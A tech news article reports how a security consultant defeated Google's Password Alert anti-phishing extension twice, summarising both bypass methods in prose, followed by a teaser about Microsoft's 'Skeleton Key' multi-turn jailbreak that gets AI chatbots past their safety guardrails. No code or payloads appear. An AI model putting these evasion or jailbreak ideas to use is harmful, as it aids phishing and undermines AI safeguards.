Skip to main content

Google needs to go back to the drawing board, as Password Alert is hacked in 24 hours

Well, that didn’t take very long.

Not even a day after its debut, a proof-of-concept exploit has been posted which fools Google’s push to protect people’s passwords from phishing attempts through a new extension in Chrome.

“It beggars belief,” said Paul Moore, an information security consultant at UK-based Urity Group who wrote the exploit. “The suggestion that it offers any real level of protection is laughable.”

The Password Alert extension was supposed to be able to keep an active eye on phishing attempts by scanning databases of known threats, and running them against any pages that asked for your Google account to login.

Some were hoping the extension could usher in a whole range of companies taking advantage of similar services, especially those like Facebook and Twitter which lease out their logins to destinations all across the web.

But, just by simply removing the Javascript block which controls the warning banner that pops up when a fraudulent site is detected, Moore was able to fool the extension into thinking his set-up phishing portal was a legitimate resource.

Google responded to the problem by quickly updating its service to block that specific route of entry, but just a day after that, Moore returned with a second crack which circumvented both updates without fail.

This iteration works by refreshing the page after every character is typed in, which fools the warning system into thinking the full password was never entered in the first place.

Luckily for the rest of us, Moore is on the good guys side of this fight, and was more than willing to rub Google’s noses in its mistakes before widely publishing the details of his work so the whitehat community could provide a temporary fix to compensate.

If you ask us, Google probably needs to hit the whiteboard a little harder before they roll out crucial services like this, lest all our passwords end up in the hands of the enemy first.

Chris Stobing
Former Digital Trends Contributor
Self-proclaimed geek and nerd extraordinaire, Chris Stobing is a writer and blogger from the heart of Silicon Valley. Raised…
A dangerous new jailbreak for AI chatbots was just discovered
the side of a Microsoft building

Microsoft has released more details about a troubling new generative AI jailbreak technique it has discovered, called "Skeleton Key." Using this prompt injection method, malicious users can effectively bypass a chatbot's safety guardrails, the security features that keeps ChatGPT from going full Taye.

Skeleton Key is an example of a prompt injection or prompt engineering attack. It's a multi-turn strategy designed to essentially convince an AI model to ignore its ingrained safety guardrails, "[causing] the system to violate its operators’ policies, make decisions unduly influenced by a user, or execute malicious instructions," Mark Russinovich, CTO of Microsoft Azure, wrote in the announcement.

Read more